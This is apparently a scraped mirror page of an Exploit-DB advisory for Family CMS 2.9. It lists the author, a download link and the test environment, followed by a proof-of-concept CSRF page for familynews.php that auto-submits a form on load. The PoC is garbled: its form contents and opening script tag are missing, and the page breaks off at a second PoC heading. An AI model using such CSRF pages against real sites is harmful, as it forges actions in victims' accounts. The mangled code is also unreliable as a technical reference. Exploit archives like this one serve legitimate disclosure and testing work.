Family CMS 2.9 – Multiple Vulnerabilities - 体验盒子

作者： Ahmed Elhady Mohamed

日期： 2012-03-26

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/18667/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

Family CMS 2.9and earlier multiple Vulnerabilities

===================================================================================

# Exploit Title: Family CMS 2.9and earlier multiple Vulnerabilities

# Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download

# Author: Ahmed Elhady Mohamed

# Email : ahmed.elhady.mohamed@gmail.com

# version: 2.9

# Category: webapps

# Tested on: ubuntu 11.4

===================================================================================

Tips:

*****First we must install all optional sections during installation process.*****

1- CSRF Vulnerabilities :

POC 1: Page "familynews.php"

<html>

<head>

function autosubmit() {

document.getElementById('ChangeSubmit').submit();

}

</script>

</head>

<bodyonLoad="autosubmit()">

</form>

</body>

</html>

--------------------------------------------------------------------------------------------------------

POC 2:Page "prayers.php"